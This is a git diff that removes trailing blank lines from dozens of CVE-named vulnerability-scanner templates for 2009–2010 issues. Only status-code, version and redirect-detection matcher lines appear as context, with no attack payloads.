b/http/cves/2009/CVE-2009-1558.yaml index 4060580924..5ac76beb15 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 0fac13bd94..46f331128e 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 3f796e302e..31e65b4bdf 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 2764356b9f..dbfbe32432 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index e3ed126755..a5acdedd1c 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 1eb7be9177..42bff805dc 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index e8bb0c04d1..4506d120b6 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 4cc0236142..75b90a2844 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -34,5 +34,3 @@ http: part: interactsh_protocol words: - "http" - - diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 1589e43531..d48847253f 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index a3960b8127..9e2b35ad95 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -29,5 +29,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index aae4a8d01f..3ff0aa3991 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 7f0e7d9ccd..1edfaf4565 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 1e7ca4f609..0314758766 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -53,5 +53,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index f39ecd70c8..fed288fa12 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -33,4 +33,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 7dd9d25a7b..8c5952373a 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index fd3f90e3c5..e9add73331 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 3c452126c9..ca34393aa0 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -31,4 +31,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index ef1b34158f..8f1e936be0 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 3c0f8d60fa..29613823cd 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index b95cdcbd01..6dfbfe6681 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index b7f5b6676c..26bfe08e34 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index a86ad7cc43..ddcb6ae8fb 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 565bc59a4a..7384ca7f75 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 214a04c35c..f1038daacf 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -31,4 +31,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index a68e397f50..6bb0cf798e 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 00d4c1f905..36ddeade8d 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 59a5043213..90bca826ff 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index dbd17fa82f..66c0e78c2c 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 2a80666b65..21afe4c34e 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index c986fbb259..56ad8ebd10 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 8a3612ab6d..065517053d 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 8fe193f10c..f31726b3bb 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -31,4 +31,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 3fcf738d59..c09f623b60 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 1c013cd199..83f73fd79c 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 4a95fcf300..21837a3f67 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 4b95cb8cef..a2e20b8354 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 6a3e9c0c98..000fe3e17e 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 820cb7f364..5c4140a495 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -31,4 +31,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 8daceadb8e..d42b08ff69 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 173821e2cf..02a2d7fb5f 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index c1e4cc3b0e..4be87fbeb0 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 063ccc4138..849735c450 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 9c0ae844ae..1171b5d2f4 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index db9aa991f0..fd6e840b1c 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 0de4bdbe30..cc35f7aaa2 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index ed23febd0b..3ab8409d01 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -30,4 +30,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index fbf113b0f3..e62fb912f4 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 60a3da59f3..90454e808a 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 48364d07b5..307e7b0ef9 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 746afa3318..f06a03b036 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 14fb8cf37b..802571dbea 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 7ce284dccf..204f19f2f8 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index fad311e31f..90474560f1 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 2c5d5ab0f5..9c01cb7a71 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -31,4 +31,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 36832656fc..6c2f72646f 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 533ac33d1f..b1b524abff 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -31,4 +31,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index e1fafb9443..fdf2893c8a 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 8e5adbf4ae..ed84b05d94 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 2e19d7978a..8f2a85bf0f 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 01d41df670..62d09cfb78 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 8b507af220..86baad8958 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 06b18e3844..37dcce1b46 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 0796588e46..9aadc30546 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 9ca8ff3086..706798a21a 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index fdf95cabd1..34db415607 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 20a6549466..c3fa85c4e4 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 50bcc50d83..d22fa195a2 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index c8698cc2d4..eb416dd006 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 4e4516ccd2..04dc0747fd 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 6e7f720fe2..e811f7b05c 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index f521c4b1a7..19351cba5f 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index de0cb8eada..6f2d0e9012 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 408a8b56a7..b23bfceafd 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 3a7dc32eae..34d3cbf00a 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 057fde7c29..612d9cc3fa 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 79661e5392..d1796e1f2b 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index c13deee018..96001f37f7 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index f84ece952c..f51e245222 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -32,5 +32,3 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' - - diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 26b30799d1..e5e01d0064 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index d3a88597d1..b7e1ce6f80 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 2de136f92d..4547145d0a 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 644a17bfce..a1d32b283c 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index a154286659..f53f57ea13 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index c0e5c40e9d..c1d4bf15f9 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 5f1721dc38..525338fdda 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -32,4 +32,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 98158ce708..bfc3674cd6 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 075d1aefd6..ab64b59947 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index ae5644ad15..b755873d71 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 822ce787d0..ec6581b133 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 9ce276862a..140b1e9262 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index f6866ef287..06e997b4d7 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 455723dde8..8ead882707 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index b0d95ac063..4b9c526519 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 59e61933fb..b4ed8ecf78 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 26ef7a59d9..6829d4b263 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 1d86cad08e..6c466e29b1 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 083497dae5..98edd8178e 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index c0925fef6a..81656ed53a 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 90b44ebcf9..6ec6a99e60 100644 --- 